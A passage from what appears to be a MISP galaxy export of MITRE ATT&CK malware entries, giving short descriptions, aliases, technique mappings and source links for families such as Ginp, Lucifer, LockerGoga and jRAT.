https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

Ginp - S0423

[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)

The tag is: misp-galaxy:mitre-malware="Ginp - S0423"

Ginp - S0423 is also known as:

Ginp

View relationships graph

Ginp - S0423 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4943. Table References
Links
https://attack.mitre.org/software/S0423
https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html

CrossRAT - S0235

[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.

The tag is: misp-galaxy:mitre-malware="CrossRAT - S0235"

CrossRAT - S0235 is also known as:

CrossRAT

View relationships graph

CrossRAT - S0235 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 4944. Table References
Links
https://attack.mitre.org/software/S0235
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

RunningRAT - S0253

[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="RunningRAT - S0253"

RunningRAT - S0253 is also known as:

RunningRAT

View relationships graph

RunningRAT - S0253 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 4945. Table References
Links
https://attack.mitre.org/software/S0253
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Judy - S0325

[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)

The tag is: misp-galaxy:mitre-malware="Judy - S0325"

Judy - S0325 is also known as:

Judy

View relationships graph

Judy - S0325 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

Table 4946. Table References
Links
https://attack.mitre.org/software/S0325
https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/

Lucifer - S0532

[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)

The tag is: misp-galaxy:mitre-malware="Lucifer - S0532"

Lucifer - S0532 is also known as:

Lucifer

View relationships graph

Lucifer - S0532 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 4947. Table References
Links
https://attack.mitre.org/software/S0532
https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/

TYPEFRAME - S0263

[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)

The tag is: misp-galaxy:mitre-malware="TYPEFRAME - S0263"

TYPEFRAME - S0263 is also known as:

TYPEFRAME

View relationships graph

TYPEFRAME - S0263 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4948. Table References
Links
https://attack.mitre.org/software/S0263
https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

GrimAgent - S0632

[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021)

The tag is: misp-galaxy:mitre-malware="GrimAgent - S0632"

GrimAgent - S0632 is also known as:

GrimAgent

View relationships graph

GrimAgent - S0632 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 4949. Table References
Links
https://attack.mitre.org/software/S0632
https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

RedDrop - S0326

[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)

The tag is: misp-galaxy:mitre-malware="RedDrop - S0326"

RedDrop - S0326 is also known as:

RedDrop

View relationships graph

RedDrop - S0326 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

Table 4950. Table References
Links
https://attack.mitre.org/software/S0326
https://www.wandera.com/reddrop-malware/

Kwampirs - S0236

[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-malware="Kwampirs - S0236"

Kwampirs - S0236 is also known as:

Kwampirs

View relationships graph

Kwampirs - S0236 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 4951. Table References
Links
https://attack.mitre.org/software/S0236
https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Siloscape - S0623

[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)

The tag is: misp-galaxy:mitre-malware="Siloscape - S0623"

Siloscape - S0623 is also known as:

Siloscape

View relationships graph

Siloscape - S0623 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 4952. Table References
Links
https://attack.mitre.org/software/S0623
https://unit42.paloaltonetworks.com/siloscape/

GravityRAT - S0237

[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)

The tag is: misp-galaxy:mitre-malware="GravityRAT - S0237"

GravityRAT - S0237 is also known as:

GravityRAT

View relationships graph

GravityRAT - S0237 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4953. Table References
Links
https://attack.mitre.org/software/S0237
https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

LockerGoga - S0372

[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)

The tag is: misp-galaxy:mitre-malware="LockerGoga - S0372"

LockerGoga - S0372 is also known as:

LockerGoga

View relationships graph

LockerGoga - S0372 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 4954. Table References
Links
https://attack.mitre.org/software/S0372
https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

Socksbot - S0273

[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="Socksbot - S0273"

Socksbot - S0273 is also known as:

Socksbot

View relationships graph

Socksbot - S0273 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 4955. Table References
Links
https://attack.mitre.org/software/S0273
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

Skygofree - S0327

[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)

The tag is: misp-galaxy:mitre-malware="Skygofree - S0327"

Skygofree - S0327 is also known as:

Skygofree

View relationships graph

Skygofree - S0327 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 4956. Table References
Links
https://attack.mitre.org/software/S0327
https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

jRAT - S0283

[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)

The tag is: misp-galaxy:mitre-malware="jRAT - S0283"

jRAT - S0283 is also known as:

jRAT
JSocket
AlienSpy
Frutas
Sockrat
Unrecom
jFrutas
Adwind
jBiFrost
Trojan.Maljava

View relationships graph

jRAT - S0283 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
